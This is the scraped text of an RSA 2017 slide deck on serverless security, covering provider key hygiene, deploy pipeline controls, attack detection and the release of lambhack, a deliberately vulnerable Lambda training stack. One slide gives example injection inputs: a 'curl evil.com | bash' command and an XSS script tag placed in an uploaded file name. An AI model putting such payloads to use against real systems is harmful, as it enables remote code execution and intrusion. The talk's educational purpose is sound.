Talk from RSA 2017 on Serverless Security and the 4 areas of growth for security in the world of serverless. In this talk, there is also the first release of lambhack, an open source, vulnerable lambda-based serverless stack demoing arbitrary code execution in lambda.
Sending Calendar Invites on SES and Calendarsnack.pdf
Serverless Security: Are you ready for the Future?
1. SESSION ID:SESSION ID:
#RSAC
James Wickett
Serverless Security:
Are you ready for the Future?
ASD-F01
Head of Research
Signal Sciences
@wickett
2. #RSAC
James Wickett
2
Head of Research at Signal Sciences
Author DevOps Fundamentals at
lynda.com
Author of book on DevOps (email me for a
free copy > james@signalsciences.com)
Blogger at theagileadmin.com and
labs.signalsciences.com
3. #RSAC
Conclusion
3
Serverless encourages functions as deploy units, coupled
with third party services that allow running end-to-end
applications without worrying about system operation.
New serverless patterns are just emerging
Security with serverless is easier
Security with serverless is harder
4. #RSAC
Conclusion (2)
4
Four key areas apply to serverless security
Software Supply Chain Security
Delivery Pipeline Security
Data Flow Security
Attack Detection
New! A very vulnerable lambda stack open source project
github.com/wickett/lambhack
15. #RSAC
Serverless was first used to
describe applications that
significantly or fully depend on 3rd
party applications / services (‘in
the cloud’) to manage server-side
logic and state.
http://martinfowler.com/articles/serverless.html
16. #RSAC
Serverless can also mean applications
where some amount of server-side logic is
still written by the application developer
but unlike traditional architectures is run
in stateless compute containers that are
event-triggered, ephemeral (may only last
for one invocation), and fully managed by
a 3rd party.
http://martinfowler.com/articles/serverless.html
17. #RSAC
History of Serverless
17
2012 - used to describe BaaS and Continuous Integration
services run by third parties
Late 2014 - AWS launched Lambda
July 2015 - AWS launched API Gateway
October 2015 - AWS re:Invent - The Serverless company using
AWS Lambda
2015 to present - Frameworks forming
2016 - Serverless Conference
http://www.slideshare.net/AmazonWebServices/arc308-
the-serverless-company-using-aws-lambda
27. #RSAC
Serverless encourages
functions as deploy units,
coupled with third party
services that allow running
end-to-end applications
without worrying about
system operation.
39. #RSAC
If you want to lead your company
bravely into the new world, you
would do well to focus lot on
how serverless will evolve.
- @Cloudopinion
https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d
40. #RSAC
Serverless encourages
functions as deploy units,
coupled with third party
services that allow running
end-to-end applications
without worrying about
system operation.
101. #RSAC
Provider Security
101
Disable root access keys
Manage users with profiles
Secure your keys in your deploy system
Secure keys in dev system
Use provider MFA
110. #RSAC
Simple Deploy Pipeline Security
110
Only dev keys can push to ‘dev’
Only build/deploy system can push to pre-prod
Integration tests must pass in this env
Security validation must take place
Allow push to prod, only by deploy system
114. #RSAC
Your provider is responsible for
the underlying infrastructure and
services. You are responsible for
ensuring you use the services in
a secure manner.
https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a
121. #RSAC
Types of Attacks
121
XSS, Injection, Deserialization, …
New surface area similar problems
e.g. appending to ‘curl evil.com | bash’ or
<script>alert(1)</script> to a filename you upload on s3
123. #RSAC
New Thing Alert!
123
Want to see make the point that appsec is still relevant in
serverless
A vulnerable Lambda + API Gateway stack (born from the
heritage of WebGoat, Rails Goat and Gruyere, …)
Introducing lambhack
125. #RSAC
lambhack
125
A Vulnerable Lambda + API Gateway stack
Open Source, MIT licensed
Released for the first time here at RSA
Includes arbitrary code execution in a query string
More work needed, PRs accepted and looking for
community help
github.com/wickett/lambhack
135. #RSAC
Conclusion
135
Serverless encourages functions as deploy units, coupled
with third party services that allow running end-to-end
applications without worrying about system operation.
New serverless patterns are just emerging
Security with serverless is easier
Security with serverless is harder
136. #RSAC
Conclusion (2)
136
Four key areas apply to serverless security
Software Supply Chain Security
Delivery Pipeline Security
Data Flow Security
Attack Detection
New! A very vulnerable lambda stack open source project
github.com/wickett/lambhack